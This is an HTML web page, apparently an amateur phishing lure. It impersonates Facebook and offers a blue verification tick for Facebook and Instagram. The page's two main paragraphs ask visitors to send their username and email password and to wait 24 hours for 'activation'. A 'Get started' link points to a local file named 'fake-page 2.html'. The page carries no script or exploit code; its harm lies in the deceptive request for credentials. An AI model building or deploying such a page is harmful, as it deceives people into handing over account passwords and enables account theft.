<html>
 
<head> 
   
   
    <title>first page</title>


              <style type="text/css">

body{body
            padding: 0;
            margin: 0;
            height: 100vh;
            background-size: 500% 500%;
            background-image: -o-linear-gradient(
                315deg,
                #231557 0%,
                #44107A 29%,
                #FF1361 67%,
                #FFF800 100%);
            background-image: linear-gradient(
                -225deg,
                #231557 0%,
                #44107A 29%,
                #FF1361 67%,
                #FFF800 100%);
            -webkit-animation: change_bg 15s linear infinite;
                    animation: change_bg 15s linear infinite;
        }
        @-webkit-keyframes change_bg{
            50%{
                background-position: 100% 100%;
            }
        }
        @keyframes change_bg{
            50%{
                background-position: 100% 100%;
            }
            }
         

#pp{
   
    background-position: center;
   
    border-style: double;
}
p.p1{
   
    font-style: italic;
    
    font-weight: bolder;
    
    font-family: "Forte";
    
    text-shadow: gray 5px 2px 10px;
   
    font-size: xx-large;
    
    background-color: crimson;
   
    padding: 0%;
   
    margin: 0px;
   
    border: 2px;
    
    border-radius: 10px;
}
p.p2
{
    font-style: italic;
   
    font-weight: bolder;
    
    font-family: "Forte";
   
    text-shadow: gray 5px 2px 10px;
    
    font-size: xx-large;
    
    background-color: crimson; padding: 0%;
    
    margin: 3px;
   
    border: 2px;
   
    border-radius: 10px;

}
#p3{
    
    background-color: white;
    width:100px;
}


</style>


</head>
  
<body>
    
    <center>
    
        <div id="pp">
    
            <img src="https://imagenesgamers.canalrcn.com/ImgTodoGamers/leer_mensajes_de_instagram_sin_dejarlos_en_visto.jpg"
    
                       width="1300px" height="200px"> <br/>
    <br/><br/>
    <br/><br/>
    <br/><br/>
    <br/><br/>
    </div>

    <p class="p1">Hi welcome to this site is used under Facebook
     
        company you can get tick blue for Facebook and 
     
        Instagram</p>
     
         <p class="p2">You should just send us your username and email password so that we
         
             can verify your identity and wait
           
                   24 hours for us to activate your
            
                           tickby</p><br/>
                
                           <div id="p3">
            
                            <table border="1">
                  
                                <tr>
                     
                                    <td>
                                         <a href="C:\Users\deade\Desktop\fake-page 2.html">Get started</a>
                                         </td>              
                     </tr>
                
                    </table>
                
                </div>
                 </center>
                                          <hr>                   
               
                                                <hr>
               
                                                     <hr>
                
                                                           <hr>
                
                                                                <hr>
               
                                                                    <hr>
                
                                                                        <hr>
                
                                                                         <hr> 
                
                                                                      <hr>
                
                                                                  <hr>
                
                                                           <hr>
                
                                                   <hr>
                
                                            <hr>
                                                                      
                                     <hr>

             




                                 



</body>
 
</html>